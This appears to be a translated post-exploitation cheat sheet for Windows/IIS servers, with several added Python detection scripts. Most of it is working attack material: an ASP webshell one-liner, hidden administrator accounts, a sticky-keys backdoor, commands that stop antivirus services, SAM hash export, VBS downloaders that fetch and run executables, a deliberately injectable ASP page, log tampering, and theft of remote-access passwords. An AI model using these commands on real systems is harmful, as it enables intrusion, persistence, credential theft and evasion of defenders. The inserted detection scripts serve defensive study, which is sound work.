Locating the path of a neighbouring site on the same server:
1. Read the web server configuration.
2. Use the following VBS (run it with cscript):
```vbscript
' Lists every IIS web site with its host-header bindings and root path (ADSI over the IIS metabase).
On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
    MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
    WScript.Quit
End If
Set objservice = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
    ' Numeric child names are site instances (1, 2, ...); other children are filters etc.
    If IsNumeric(obj3w.Name) Then
        Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
        Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
        If Err <> 0 Then WScript.Quit (1)
        WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
        ' Each binding is "IP:port:hostheader"; print only the host header part.
        For Each Binds In OService.ServerBindings
            Web = "{ " & Replace(Binds, ":", " } { ") & " }"
            WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
        Next
        WScript.Echo "Path : " & VDirObj.Path
    End If
Next
```
3. Enumerate with iis_spy (note: this needs ASPX support; the countermeasure against IISSPY is to strip the permissions on activeds.dll and activeds.tlb).
4. If you have obtained the target site's directory but cannot reach it directly, you can write a webshell into the target directory with "echo ^<%execute(request("cmd"))%^> >>X:\target dir\X.asp" or "copy scriptfile X:\target dir\X.asp", or try the type command as well.
Likely site directory (note: usually on virtual-hosting boxes):
```text
data/htdocs.<site>/<site>/
```
VPN-related knowledge and references for the CMD prompt:
# Allow administrator to dial in to this VPN:
```batch
netsh ras set user administrator permit
```
# Forbid administrator from dialling in to this VPN:
```batch
netsh ras set user administrator deny
```
# Show which users may dial in to the VPN:
```batch
netsh ras show user
```
# Show how the VPN assigns IP addresses:
```batch
netsh ras ip show config
```
# Assign IP addresses from an address pool:
```batch
netsh ras ip set addrassign method = pool
```
# Set the address pool to range from 192.168.3.1 to 192.168.3.254:
```batch
netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254
```
Adding a SQL user from Cmd/DOS:
This requires administrator rights. First create a file c:\test.qry at the command line with the following content:
```sql
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test', 'sysadmin'
```
Then run from DOS: cmd.exe /c isql -E /U alma /P /i c:\test.qry
An alternative way of adding a user:
A new way to add a user when net.exe has been deleted and ADSI is not available. The code is as follows:
js:
```javascript
var o = new ActiveXObject("Shell.Users");
z = o.create("test");
z.changePassword("123456", "");
z.setting("AccountType") = 3;
```
vbs:
```vbscript
Set o = CreateObject("Shell.Users")
Set z = o.create("test")
z.changePassword "123456", ""
z.setting("AccountType") = 3
```
Cmd access-control (ACL) operations:
The commands are:
```batch
REM Grant Everyone full control of the C: drive
cacls c:\ /e /t /g everyone:F
REM Deny Everyone (including admin) read access to a directory
cacls "directory" /d everyone
```
Note:
Countermeasure: in the folder's security settings set Everyone to deny read; if there is no Security tab: Tools - Folder Options - untick "Use simple file sharing".
3389-related (works better combined with PR):
a. Firewall / TCP/IP filtering (turn off with: net stop policyagent & net stop sharedaccess)
b. Internal-network environment (lcx.exe)
c. "The terminal server has exceeded the maximum number of allowed connections" (XP: run mstsc /admin; 2003: run mstsc /console)
1. Query the terminal services port:
```batch
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
```
2. Enable terminal services on XP & 2003:
```batch
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
```
3. Change the terminal services port to 2008 (0x7d8 in hex):
```batch
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 0x7d8 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x7D8 /f
```
4. Remove the XP & 2003 system firewall's restriction on terminal services and on connecting IPs:
```batch
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:@xpsp2res.dll,-22009" /f
```
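As an added defender-side example (not part of the original post), the Python below parses the output of the REG query commands above and flags the three changes this section makes: a non-default RDP port, fDenyTSConnections cleared, and GloballyOpenPorts entries open to any remote address. The sample output is constructed.

```python
import re

# Constructed sample: REG QUERY output for the keys this section edits (not real host data).
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    PortNumber    REG_DWORD    0x7d8

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
    3389:TCP    REG_SZ    3389:TCP:*:Enabled:@xpsp2res.dll,-22009
    2008:TCP    REG_SZ    2008:TCP:*:Enabled:RDP
"""

# A value line is "    <name>    <REG_type>    <data>" (REG QUERY indents values).
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}} from REG QUERY output."""
    tree, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            tree.setdefault(current, {})
        elif current is not None:
            m = VALUE_RE.match(line)
            if m:
                tree[current][m.group(1)] = (m.group(2), m.group(3))
    return tree


def find_value(tree, key_suffix, name):
    """Return (type, data) of `name` under the first key whose path ends with key_suffix."""
    for path, values in tree.items():
        if path.lower().endswith(key_suffix.lower()) and name in values:
            return values[name]
    return None


def audit_rdp(text):
    """Return a list of findings; an empty list means none of the changes above are present."""
    findings = []
    tree = parse_reg_query(text)

    port = find_value(tree, r"WinStations\RDP-Tcp", "PortNumber")
    if port is not None and int(port[1], 16) != 3389:
        findings.append(f"RDP listens on non-default port {int(port[1], 16)}")

    deny = find_value(tree, r"Control\Terminal Server", "fDenyTSConnections")
    if deny is not None and int(deny[1], 16) == 0:
        findings.append("Terminal Services connections are enabled (fDenyTSConnections=0)")

    # Firewall entries look like "port:proto:scope:Enabled:name"; scope "*" means any remote address.
    for path, values in tree.items():
        if path.lower().endswith(r"globallyopenports\list"):
            for _name, (_type, data) in values.items():
                parts = data.split(":")
                if len(parts) >= 4 and parts[3].lower() == "enabled" and parts[2] == "*":
                    findings.append(f"firewall exception {parts[0]}/{parts[1]} is open to any address")
    return findings


if __name__ == "__main__":
    for finding in audit_rdp(SAMPLE_REG_OUTPUT):
        print("FINDING:", finding)
```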
Adding a user through MySQL (INTO OUTFILE writes a VBS into the All Users Startup folder):
```sql
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"")");
insert into a values ("a=wshshell.run (""cmd.exe /c net user admin admin /add"",0)");
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators admin /add"",0)");
-- "「开始」菜单\程序\启动" is the Chinese-locale Start Menu\Programs\Startup folder
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
```
The BS trojan's PortMap function forwards ports the way LCX does. If ASPX is supported, forwarding this way is somewhat stealthier. (Note: I had always overlooked that function sitting in an obscure corner.)
Shutting down common antivirus products (strip all permissions on the antivirus's files):
Dealing with the stubborn Norton Corporate Edition:
```batch
net stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
net stop "Symantec Settings Manager" /y
```
McAfee:
```batch
net stop "McAfee McShield"
```
Symantec virus logs:
```text
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Logs
```
Symantec virus backups (quarantine):
```text
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\Quarantine
```
Nod32 virus backups (quarantine):
```text
C:\Docume~1\Administrator\Local Settings\Application Data\ESET\ESET NOD32 Antivirus\Quarantine
```
Removing Nod32's password protection:
Delete "HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID".
Installing the 5×Shift (sticky keys) backdoor and the Shift-replacement backdoor:
5×Shift, sticky keys backdoor:
```batch
copy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
```
Shift-replacement backdoor:
```batch
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
del c:\windows\system32\sethc.exe
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h +r +s
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
```
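As an added defender-side check (not from the original post), the Python below detects both variants above by hashing: sethc.exe or its dllcache copy being byte-identical to cmd.exe or explorer.exe, or the live file no longer matching the dllcache copy. The embedded file contents are constructed stand-ins; on a Windows host `load_from_disk()` reads the real files.

```python
import hashlib
import os

ROOT = os.environ.get("SystemRoot", r"C:\Windows")

# Where each file lives on disk; explorer.exe sits in %SystemRoot%, the rest in system32.
LOCATIONS = {
    "sethc.exe": os.path.join(ROOT, "system32", "sethc.exe"),
    "dllcache/sethc.exe": os.path.join(ROOT, "system32", "dllcache", "sethc.exe"),
    "cmd.exe": os.path.join(ROOT, "system32", "cmd.exe"),
    "explorer.exe": os.path.join(ROOT, "explorer.exe"),
}
SHELLS = ("cmd.exe", "explorer.exe")  # the binaries the page copies over sethc.exe


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def audit_sethc(files):
    """files maps the names in LOCATIONS to file contents (bytes).
    Returns a list of findings; an empty list means sethc.exe looks untouched."""
    findings = []
    shell_hashes = {n: sha256(files[n]) for n in SHELLS if n in files}
    for target in ("sethc.exe", "dllcache/sethc.exe"):
        if target not in files:
            continue
        h = sha256(files[target])
        for shell, sh in shell_hashes.items():
            if h == sh:
                findings.append(f"{target} is byte-identical to {shell}")
    # The protected dllcache copy should match the live file; a mismatch means one was swapped.
    if "sethc.exe" in files and "dllcache/sethc.exe" in files:
        if sha256(files["sethc.exe"]) != sha256(files["dllcache/sethc.exe"]):
            findings.append("sethc.exe differs from its dllcache copy")
    return findings


def load_from_disk(locations=LOCATIONS):
    """Read the real files on a Windows host; missing files are skipped."""
    out = {}
    for name, path in locations.items():
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                out[name] = fh.read()
    return out


# Constructed stand-ins for the binaries so the check runs offline (not real file contents).
CLEAN = {
    "sethc.exe": b"MZ-sethc-original",
    "dllcache/sethc.exe": b"MZ-sethc-original",
    "cmd.exe": b"MZ-cmd",
    "explorer.exe": b"MZ-explorer",
}
# The same host after the first batch of copy commands above: both copies replaced by cmd.exe.
BACKDOORED = dict(CLEAN, **{"sethc.exe": b"MZ-cmd", "dllcache/sethc.exe": b"MZ-cmd"})

if __name__ == "__main__":
    print("clean host:", audit_sethc(CLEAN) or "no findings")
    print("backdoored host:", audit_sethc(BACKDOORED))
    if os.name == "nt":
        print("this host:", audit_sethc(load_from_disk()) or "no findings")
```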
Adding a hidden system account:
1. Run: "net user admin$ 123456 /add & net localgroup administrators admin$ /add".
2. Export the user's two registry keys under SAM.
3. Delete admin$ in the user-management UI, then import the backed-up registry keys again.
4. Use Hacker Defender to hide the related user registry keys.
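As an added defender-side check (not from the original post): an account re-created from exported SAM keys can be absent from `net user` while its name still exists as a subkey under SAM\SAM\Domains\Account\Users\Names, which SYSTEM can list with reg query. The Python below compares the two listings and also flags the `$` naming used above; both samples are constructed.

```python
# Constructed sample of `net user` output (not real host data).
SAMPLE_NET_USER = """\
User accounts for \\\\WEB01

-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_WEB01
IWAM_WEB01               SUPPORT_388945a0
The command completed successfully.
"""

# Constructed sample of `reg query HKLM\SAM\SAM\Domains\Account\Users\Names`
# run as SYSTEM (administrators cannot read the SAM hive by default).
SAMPLE_SAM_NAMES = r"""
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\admin$
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_WEB01
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IWAM_WEB01
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\SUPPORT_388945a0
"""


def parse_net_user(text):
    """Names printed by `net user`: everything between the dashed rule and the status line."""
    names, in_list = set(), False
    for line in text.splitlines():
        if line.startswith("----"):
            in_list = True
        elif line.startswith("The command"):
            break
        elif in_list:
            names.update(line.split())
    return names


def parse_sam_names(text):
    """Leaf names of the subkeys directly under ...\\Users\\Names in REG QUERY output."""
    names = set()
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("HKEY_"):
            continue
        parent, _, leaf = line.rpartition("\\")
        if parent.lower().endswith(r"\users\names"):
            names.add(leaf)
    return names


def hidden_accounts(net_user_text, sam_names_text):
    """Accounts known to the SAM but missing from `net user`, plus any name ending in '$'
    (the naming used for the hidden account above), sorted case-insensitively."""
    listed = parse_net_user(net_user_text)
    in_sam = parse_sam_names(sam_names_text)
    listed_lower = {n.lower() for n in listed}
    suspicious = {n for n in in_sam if n.lower() not in listed_lower}
    suspicious |= {n for n in listed | in_sam if n.endswith("$")}
    return sorted(suspicious, key=str.lower)


if __name__ == "__main__":
    print("suspicious accounts:", hidden_accounts(SAMPLE_NET_USER, SAMPLE_SAM_NAMES))
```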
Installing an MSSQL extended-procedure backdoor:
```sql
USE master;
EXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
```
Handling the server's MSFTP logs:
Under "C:\WINNT\system32\LogFiles\MSFTPSVC1\" there are three files, ex011120.log / ex011121.log / ex011124.log; deleting ex011124.log directly fails with "the file ... is in use".
"ex011120.log / ex011121.log" can of course be deleted directly. Then open "ex011124.log" in Notepad, delete some of its contents, save, overwrite and exit; that succeeds.
Once the "msftpsvc" service is stopped, "ex011124.log" can be deleted directly.
Clearing MSSQL Query Analyzer connection history:
For MSSQL 2000 it is in the registry at:
```text
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
```
Find the entries for the servers that were connected to and delete them.
For MSSQL 2005 it is at:
```text
C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
```
A trick against interception by BT-style security systems: use a remote-download shell:
```asp
<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName, s_RemoteFileUrl)
    Dim Ads, Retrieval, GetRemoteData
    On Error Resume Next
    Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
    With Retrieval
        .Open "Get", s_RemoteFileUrl, False, "", ""
        .Send
        GetRemoteData = .ResponseBody
    End With
    Set Retrieval = Nothing
    Set Ads = Server.CreateObject("Adodb.Stream")
    With Ads
        .Type = 1
        .Open
        .Write GetRemoteData
        .SaveToFile Server.MapPath(s_LocalFileName), 2
        .Cancel()
        .Close()
    End With
    Set Ads = Nothing
End Sub
eWebEditor_SaveRemoteFile "your shell's name", "your shell's url"
%>
```
A trick against interception by BT-style security systems: the remote-download shell also hides itself and can serve as an extremely stealthy backdoor; the so-called undetectable webshells all get knocked out as soon as a server security tool scans them.
Privilege escalation via VNC, Radmin and PcAnywhere:
First use the shell to read the VNC password ciphertext stored in the registry, then crack it with the VNC4X tool.
Registry location: HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
Radmin's default port is 4899; first obtain the password and port from these locations:
```text
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter   // registry location of the default password
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port        // registry location of the default port
```
Then connect with the hash version of the client.
If we obtain a webshell on a host and find PcAnywhere installed, and the directory holding its password file is accessible to our IUSR-level account, we can download that CIF file, crack it locally, and then log in to the server from our own machine with PcAnywhere.
The CIF file holding the password is not in the PcAnywhere installation directory but on the drive PcAnywhere was installed to, under:
```text
\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
```
If PcAnywhere is installed under "D:\program\", its password file is kept in the "D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\" folder.
WinWebMail privilege escalation and adding a user:
WinWebMail's web directory must be readable and writable by Everyone. In the Start menu find the WinWebMail shortcut, read its path, browse to "<path>/web", upload a shell, and when the shell is opened it runs as SYSTEM; drop a remote-control tool into the startup items and wait for the next reboot.
If the cmd component has not been removed you can add a user directly. 7i24's web directory is also writable, with administrator privileges.
Building an injection point with 1433 SA privileges:
```asp
<%
strSQLServerName = "server ip"
strSQLDBUserName = "database account"
strSQLDBPassword = "database password"
strSQLDBName = "database name"
Set conn = server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
conn.open strCon
Dim rs, strSQL, id
Set rs = server.CreateObject("ADODB.recordset")
id = request("id")
' id is concatenated into the query unescaped, which is what makes this page injectable
strSQL = "select * from ACTLIST where worldid=" & id
rs.open strSQL, conn, 1, 3
rs.Close
%>
```
Privilege escalation:
Run systeminfo first.
Token-kidnapping vulnerability patch number: KB956572
Churrasco: KB952004
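As an added defender-side example (not from the original post), the Python below parses the Hotfix(s) section of systeminfo output and reports which of the two patch numbers named above are not installed. The systeminfo sample is constructed.

```python
import re

# Patch numbers named on this page: KB956572 (token kidnapping), KB952004 (Churrasco).
PAGE_KBS = ("KB956572", "KB952004")

# Constructed sample of the relevant part of `systeminfo` output (not real host data).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WEB01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB952004
                           [03]: KB958644
Network Card(s):           1 NIC(s) Installed.
"""

# Each installed hotfix is listed as "[NN]: KBnnnnnn" (older ones as "Qnnnnnn").
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+|Q\d+)", re.IGNORECASE)


def installed_hotfixes(text):
    """Return the set of hotfix ids (upper-cased) listed under Hotfix(s)."""
    return {m.group(1).upper() for m in KB_RE.finditer(text)}


def missing_hotfixes(text, wanted=PAGE_KBS):
    """Return the entries of `wanted` that are not installed, in the given order."""
    have = installed_hotfixes(text)
    return [kb for kb in wanted if kb.upper() not in have]


def os_version(text):
    """The 'OS Version:' field, or None if absent."""
    m = re.search(r"^OS Version:\s*(.+)$", text, re.MULTILINE)
    return m.group(1).strip() if m else None


if __name__ == "__main__":
    print("OS version:", os_version(SAMPLE_SYSTEMINFO))
    print("Installed hotfixes:", sorted(installed_hotfixes(SAMPLE_SYSTEMINFO)))
    print("Missing from this page's list:", missing_hotfixes(SAMPLE_SYSTEMINFO))
```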
Packing with RAR from the command line:
```batch
rar a -k -r -s -m3 c:\1.rar c:\folder
```
A script for collecting system information:
For Windows:
```batch
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with atq#####
echo schtask /query
echo.
echo ####task-list#############
tasklist /svc
echo.
echo ####network information
ipconfig /all
route print
arp -a
netstat -an
ipconfig /displaydns
echo.
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree /F
```
Getting the local hashes when gethash is caught by antivirus:
First export the registry:
```batch
REM Windows 2000:
regedit /e d:\aa.reg "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users"
REM Windows 2003:
reg export "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users" d:\aa.reg
```
Mind the permissions: by default the SAM registry key cannot be accessed; it has to be set to Full Control before it can be read (interactive logons need to watch this; SYSTEM can ignore it).
The rest is easy: download the exported registry file to your own machine, edit the registry header, import it locally, then run a hash-dumping tool against the local users and you are done.
After dumping the hashes remember to change your own account's password back!
When GetHashes cannot obtain the hashes, use IceSword to copy the sam file to the desktop. As far as I know, someone used this method several times on virtual machines they could not get into because they didn't know the password!
VBS downloaders:
1:
```batch
echo Set sGet = createObject("ADODB.Stream") >>c:\windows\cftmon.vbs
echo sGet.Mode = 3 >>c:\windows\cftmon.vbs
echo sGet.Type = 1 >>c:\windows\cftmon.vbs
echo sGet.Open() >>c:\windows\cftmon.vbs
echo sGet.Write(xPost.responseBody) >>c:\windows\cftmon.vbs
echo sGet.SaveToFile "c:\windows\e.exe",2 >>c:\windows\cftmon.vbs
echo Set objShell = CreateObject("Wscript.Shell") >>c:\windows\cftmon.vbs
echo objshell.run """c:\windows\e.exe""" >>c:\windows\cftmon.vbs
cftmon.vbs
```
2:
```vbscript
On Error Resume Next:Dim iRemote,iLocal,s1,s2
iLocal = LCase(WScript.Arguments(1)):iRemote = LCase(WScript.Arguments(0))
s1="Mi"+"cro"+"soft"+"."+"XML"+"HTTP":s2="ADO"+"DB"+"."+"Stream"
Set xPost = CreateObject(s1):xPost.Open "GET",iRemote,0:xPost.Send()
Set sGet = CreateObject(s2):sGet.Mode=3:sGet.Type=1:sGet.Open()
sGet.Write(xPost.responseBody):sGet.SaveToFile iLocal,2
```
Usage:
```batch
cscript c:\down.vbs http://xxxx/mm.exe c:\mm.exe
```
Directory tricks at the Cmd prompt:
List all directories under d:\freehost:
```batch
for /d %i in (d:\freehost\*) do @echo %i
```
Show only the folders in the current path whose names are 1-3 characters long:
```batch
for /d %i in (???) do @echo %i
```
Using the current directory as the search root, list every EXE file in it and its subdirectories:
```batch
for /r %i in (*.exe) do @echo %i
```
Using a specified directory as the search root, list every file in it and its subdirectories:
```batch
for /r "f:\freehost\hmadesign\web\" %i in (*.*) do @echo %i
```
This prints the contents of the file (c:\1.txt here), because /f makes the loop read the file line by line:
```batch
for /f %i in (c:\1.txt) do echo %i
```
The character after delims= (a space here) is the delimiter; tokens= selects which field to take:
```batch
for /f "tokens=2 delims= " %i in (a.txt) do echo %i
```
Some common paths on Windows systems (the C: drive can be swapped for D:, E: and so on; hosting panels such as FreeHost (星外) and HZHost (华众) usually put things on D:):
c:/windows/php.ini
c:/boot.ini
c:/1.txt
c:/a.txt
c:/CMailServer/config.ini
c:/CMailServer/CMailServer.exe
c:/CMailServer/WebMail/index.asp
c:/program files/CMailServer/CMailServer.exe
c:/program files/CMailServer/WebMail/index.asp
C:/WinWebMail/SysInfo.ini
C:/WinWebMail/Web/default.asp
C:/WINDOWS/FreeHost32.dll
C:/WINDOWS/7i24iislog4.exe
C:/WINDOWS/7i24tool.exe
c:/hzhost/databases/url.asp
c:/hzhost/hzclient.exe
C:/Documents and Settings/All Users/「开始」菜单/程序/7i24虚拟主机管理平台/自动设置[受控端].lnk
C:/Documents and Settings/All Users/「开始」菜单/程序/Serv-U/Serv-U Administrator.lnk
C:/WINDOWS/web.config
c:/web/index.html
c:/www/index.html
c:/WWWROOT/index.html
c:/website/index.html
c:/web/index.asp
c:/www/index.asp
c:/wwwsite/index.asp
c:/WWWROOT/index.asp
c:/web/index.php
c:/www/index.php
c:/WWWROOT/index.php
c:/WWWsite/index.php
c:/web/default.html
c:/www/default.html
c:/WWWROOT/default.html
c:/website/default.html
c:/web/default.asp
c:/www/default.asp
c:/wwwsite/default.asp
c:/WWWROOT/default.asp
c:/web/default.php
c:/www/default.php
c:/WWWROOT/default.php
c:/WWWsite/default.php
C:/Inetpub/wwwroot/pagerror.gif
c:/windows/notepad.exe
c:/winnt/notepad.exe
C:/Program Files/Microsoft Office/OFFICE10/winword.exe
C:/Program Files/Microsoft Office/OFFICE11/winword.exe
C:/Program Files/Microsoft Office/OFFICE12/winword.exe
C:/Program Files/Internet Explorer/IEXPLORE.EXE
C:/Program Files/winrar/rar.exe
C:/Program Files/360/360Safe/360safe.exe
C:/Program Files/360Safe/360safe.exe
C:/Documents and Settings/Administrator/Application Data/360Safe/360Examine/360Examine.log
c:/ravbin/store.ini
c:/rising.ini
C:/Program Files/Rising/Rav/RsTask.xml
C:/Documents and Settings/All Users/Start Menu/desktop.ini
C:/Documents and Settings/Administrator/My Documents/Default.rdp
C:/Documents and Settings/Administrator/Cookies/index.dat
C:/Documents and Settings/Administrator/My Documents/新建 文本文档.txt
C:/Documents and Settings/Administrator/桌面/新建 文本文档.txt
C:/Documents and Settings/Administrator/My Documents/1.txt
C:/Documents and Settings/Administrator/桌面/1.txt
C:/Documents and Settings/Administrator/My Documents/a.txt
C:/Documents and Settings/Administrator/桌面/a.txt
C:/Documents and Settings/All Users/Documents/My Pictures/Sample Pictures/Blue hills.jpg
E:/Inetpub/wwwroot/aspnet_client/system_web/1_1_4322/SmartNav.htm
C:/Program Files/RhinoSoft.com/Serv-U/Version.txt
C:/Program Files/RhinoSoft.com/Serv-U/ServUDaemon.ini
C:/Program Files/Symantec/SYMEVENT.INF
C:/Program Files/Microsoft SQL Server/80/Tools/Binn/sqlmangr.exe
C:/Program Files/Microsoft SQL Server/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL.1/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL.2/MSSQL/Data/master.mdf
C:/Program Files/Microsoft SQL Server/80/Tools/HTML/database.htm
C:/Program Files/Microsoft SQL Server/MSSQL/README.TXT
C:/Program Files/Microsoft SQL Server/90/Tools/Bin/DdsShapes.dll
C:/Program Files/Microsoft SQL Server/MSSQL/sqlsunin.ini
C:/MySQL/MySQL Server 5.0/my.ini
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql/user.frm
C:/Program Files/MySQL/MySQL Server 5.0/COPYING
C:/Program Files/MySQL/MySQL Server 5.0/share/mysql_fix_privilege_tables.sql
C:/Program Files/MySQL/MySQL Server 4.1/bin/mysql.exe
c:/MySQL/MySQL Server 4.1/bin/mysql.exe
c:/MySQL/MySQL Server 4.1/data/mysql/user.frm
C:/Program Files/Oracle/oraconfig/Lpk.dll
C:/WINDOWS/Microsoft.NET/Framework/v2.0.50727/aspnet_state.exe
C:/WINDOWS/system32/inetsrv/w3wp.exe
C:/WINDOWS/system32/inetsrv/inetinfo.exe
C:/WINDOWS/system32/inetsrv/MetaBase.xml
C:/WINDOWS/system32/inetsrv/iisadmpwd/achg.asp
C:/WINDOWS/system32/config/default.LOG
C:/WINDOWS/system32/config/sam
C:/WINDOWS/system32/config/system
c:/CMailServer/config.ini
c:/program files/CMailServer/config.ini
c:/tomcat6/tomcat6/bin/version.sh
c:/tomcat6/bin/version.sh
c:/tomcat/bin/version.sh
c:/program files/tomcat6/bin/version.sh
C:/Program Files/Apache Software Foundation/Tomcat 6.0/bin/version.sh
c:/Program Files/Apache Software Foundation/Tomcat 6.0/logs/isapi_redirect.log
c:/Apache2/Apache2/bin/Apache.exe
c:/Apache2/bin/Apache.exe
c:/Apache2/php/license.txt
C:/Program Files/Apache Group/Apache2/bin/Apache.exe
c:/Program Files/QQ2007/qq.exe
c:/Program Files/Tencent/qq/User.db
c:/Program Files/Tencent/qq/qq.exe
c:/Program Files/Tencent/qq/bin/qq.exe
c:/Program Files/Tencent/qq2009/qq.exe
c:/Program Files/Tencent/qq2008/qq.exe
c:/Program Files/Tencent/qq2010/bin/qq.exe
c:/Program Files/Tencent/qq/Users/All Users/Registry.db
C:/Program Files/Tencent/TM/TMDlls/QQZip.dll
c:/Program Files/Tencent/Tm/Bin/Txplatform.exe
c:/Program Files/Tencent/RTXServer/AppConfig.xml
C:/Program Files/Foxmal/Foxmail.exe
C:/Program Files/Foxmal/accounts.cfg
C:/Program Files/tencent/Foxmal/Foxmail.exe
C:/Program Files/tencent/Foxmal/accounts.cfg
C:/Program Files/LeapFTP 3.0/LeapFTP.exe
C:/Program Files/LeapFTP/LeapFTP.exe
c:/Program Files/GlobalSCAPE/CuteFTP Pro/cftppro.exe
c:/Program Files/GlobalSCAPE/CuteFTP Pro/notes.txt
C:/Program Files/FlashFXP/FlashFXP.ini
C:/Program Files/FlashFXP/flashfxp.exe
c:/Program Files/Oracle/bin/regsvr32.exe
c:/Program Files/腾讯游戏/QQGAME/readme.txt
c:/Program Files/tencent/腾讯游戏/QQGAME/readme.txt
c:/Program Files/tencent/QQGAME/readme.txt
C:/Program Files/StormII/Storm.exe
A comprehensive list of relative paths to the configuration files of various sites:
/config.php
../../config.php
../config.php
../../../config.php
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/conn.php
./conn.php
../../conn.php
../conn.php
../../../conn.php
/conn.asp
./conn.asp
../../conn.asp
../conn.asp
../../../conn.asp
/config.inc.php
./config.inc.php
../../config.inc.php
../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
../config/config.php
../../../config/config.php
/config/config.inc.php
./config/config.inc.php
../../config/config.inc.php
../config/config.inc.php
../../../config/config.inc.php
/config/conn.php
./config/conn.php
../../config/conn.php
../config/conn.php
../../../config/conn.php
/config/conn.asp
